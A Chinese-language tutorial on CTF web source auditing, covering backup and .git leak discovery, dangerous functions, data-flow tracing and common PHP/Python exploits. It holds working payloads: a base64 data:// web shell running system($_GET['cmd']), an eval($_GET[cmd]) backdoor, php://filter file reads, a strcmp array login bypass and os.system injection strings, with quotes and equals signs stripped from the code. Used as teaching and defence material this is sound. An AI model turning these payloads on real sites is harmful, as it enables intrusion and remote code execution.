CTF Web 源码审计 5 步法从备份文件泄露到 Flag 构造实战在CTF竞赛中Web类题目往往是最容易上手但也最考验综合能力的赛道。不同于二进制逆向或密码学需要深厚的理论基础Web安全更注重实战中的漏洞嗅觉和快速验证能力。本文将系统化拆解一套经过数十场赛事验证的源码审计方法论从信息收集到Payload构造形成完整闭环帮助你在下一场比赛中快速定位突破口。1. 信息收集挖掘源码的四种黄金路径源码审计的第一步永远是尽可能获取更多代码。以下是实战中最有效的四种源码获取方式1.1 备份文件泄露开发者的习惯性陷阱# 常见备份文件后缀扫描 dirsearch -u http://target.com -e .bak,.swp,.old,.temp,.zip,.tar.gz典型场景.index.php.swpvim交换文件wwwroot.zip全站压缩备份config.php.bak配置文件备份注意部分CTF题目会故意修改备份文件后缀建议结合字典爆破1.2 版本控制泄露Git/SVN的元数据隐患# Git仓库探测 curl -s http://target.com/.git/HEAD | grep -q ref: echo Git found利用工具对比工具名称适用场景优势GitHack.git目录完整泄露自动重建完整项目DVCS-Ripper多版本控制系统支持支持SVN/Hg等GitTools部分文件恢复可处理残缺git目录1.3 注释审计被忽视的线索宝库PHP示例代码中的危险注释// TODO: Remove debug function before production eval($_GET[cmd]); /* * Temporary admin login: * admin:Admin123 */审计技巧搜索TODO/FIXME等关键字检查HTML源码中的关注函数头的参数说明1.4 非常规入口API文档与测试接口GET /swagger-ui.html HTTP/1.1 Host: target.com常见隐藏入口/phpinfo.php服务器配置泄露/test/api_docs接口文档/console开发控制台2. 敏感函数定位快速锁定漏洞点获得源码后需要通过关键函数快速定位潜在漏洞。不同语言的风险函数各有特征2.1 PHP危险函数清单代码执行类eval(), assert(), system(), preg_replace(/e)文件操作类file_get_contents(), include(), fopen()数据库操作类mysqli_query(), PDO::prepare()2.2 Java常见风险点// 反序列化漏洞 ObjectInputStream.readObject() // 表达式注入 SpELParser.parseExpression()2.3 Python需警惕的用法# 命令注入 os.system(input()) # 模板注入 flask.render_template_string(request.args.get(tmpl))自动化扫描建议使用graudit进行源码静态分析配合正则表达式自定义规则/(eval\(|system\()\s*?\$_(GET|POST|REQUEST)/3. 变量追踪理解数据流的三种方法找到危险函数只是开始更需要理清用户输入如何传递到这些函数3.1 正向追踪法从入口点开始追踪数据流$_GET[id] → $user_input → SQL查询3.2 反向追踪法从危险函数回溯os.system() ← get_input() ← request.args3.3 关键节点标记在代码中标记数据处理关键节点输入过滤点类型转换点最终执行点典型漏洞链示例用户输入 → 弱类型比较 → 认证绕过 → 文件包含4. 漏洞利用五种高频攻击模式4.1 变量覆盖漏洞// 原代码 $flag fake_flag; extract($_GET); // 利用方式 ?flagreal_flag防御方案使用array_merge代替extract设置extract_type为EXTR_SKIP4.2 弱类型比较陷阱if ($_POST[password] md5($real_password)) { // 可被 0e开头的哈希绕过 }安全比较方案hash_equals($stored_hash, $input_hash)4.3 反序列化漏洞Java示例ObjectInputStream ois new ObjectInputStream( new ByteArrayInputStream(base64.decode(payload))); ois.readObject(); // 触发反序列化防护建议使用JSON替代序列化实现readObject时进行校验4.4 文件包含技巧include($_GET[page] . .php);利用方式?pagephp://filter/convert.base64-encode/resourceconfig ?pagedata://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk74.5 代码注入的变形艺术# 原代码 eval(print(Hello name)) # 注入方式 name);os.system(ls);#沙箱逃逸技巧利用__import__导入模块通过getattr获取危险函数5. Flag构造从理论到实战的完整案例5.1 真实赛题复现题目背景提供网站源码zip包首页存在登录功能提示flag在/flag.php审计过程发现login.php使用strcmp比较密码构造数组绕过password[]admin获取源码后发现文件包含漏洞通过php://filter读取flag.php最终PayloadPOST /login.php HTTP/1.1 ... usernameadminpassword[]admin GET /include.php?filephp://filter/convert.base64-encode/resourceflag.php5.2 防御方案对比漏洞类型错误实现正确方案SQL注入直接拼接查询PDO预处理XSS直接输出用户输入htmlspecialchars过滤文件上传仅检查Content-Type文件头校验随机文件名命令注入直接拼接命令白名单校验参数化执行在CTF竞赛中Web安全既是入门的最佳路径也是检验综合能力的试金石。通过系统化的源码审计方法即使是复杂的题目也能快速分解为可控的步骤。记住每个漏洞背后都是开发者的思维盲点而你的任务就是成为那个发现盲点的思维黑客。